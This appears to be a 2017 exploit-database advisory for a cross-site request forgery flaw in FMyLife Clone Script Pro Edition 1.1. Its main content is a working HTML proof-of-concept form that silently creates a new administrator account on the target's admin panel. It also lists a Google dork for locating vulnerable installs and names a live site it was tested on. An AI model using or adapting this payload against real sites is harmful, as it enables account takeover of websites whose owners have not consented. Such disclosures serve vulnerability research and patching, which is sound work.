FMyLife Clone Script Pro Edition 1.1 Cross Site Request Forgery

2017.01.11
Credit: Ihsan Sencan
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# # # # # # Vulnerability: Add Admin Exploit (Add/Edit/Delete/ Category, Admin Vs...) # Google Dork: FMyLife Clone Script # Date:10.01.2017 # Vendor Homepage: http://alstrasoft.com/fmylife-pro.htm # Tested on: http://www.tellaboutit.com/admin/ # Script Name: FMyLife Clone Script (Pro Edition) # Script Version: 1.1 # Script Buy Now: http://www.hotscripts.com/listing/fmylife-clone-script-pro-edition/ # Author: Ihsan Sencan # Author Web: http://ihsan.net # Mail : ihsan[beygir]ihsan[nokta]net # # # # # #Exploit : <html> <body> <h2>Add an Administrator</h2> <form action="http://localhost/[PATH]/admin/" method="post"> <div id="add-admin-form"> <input type="hidden" name="action" value="add-admin" /> <label for="username">Username:</label> <input type="text" id="username" name="admin-username" value="" /> <div class="spacer"></div> <label for="password">Password:</label> <input type="password" id="password" name="admin-password" value="" /> <div class="spacer"></div> <input type="image" src="add-administrator.png" name="add-admin" id="add-admin" value="Add Administrator" /> </div> </form> </body> </html> # # # # #


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top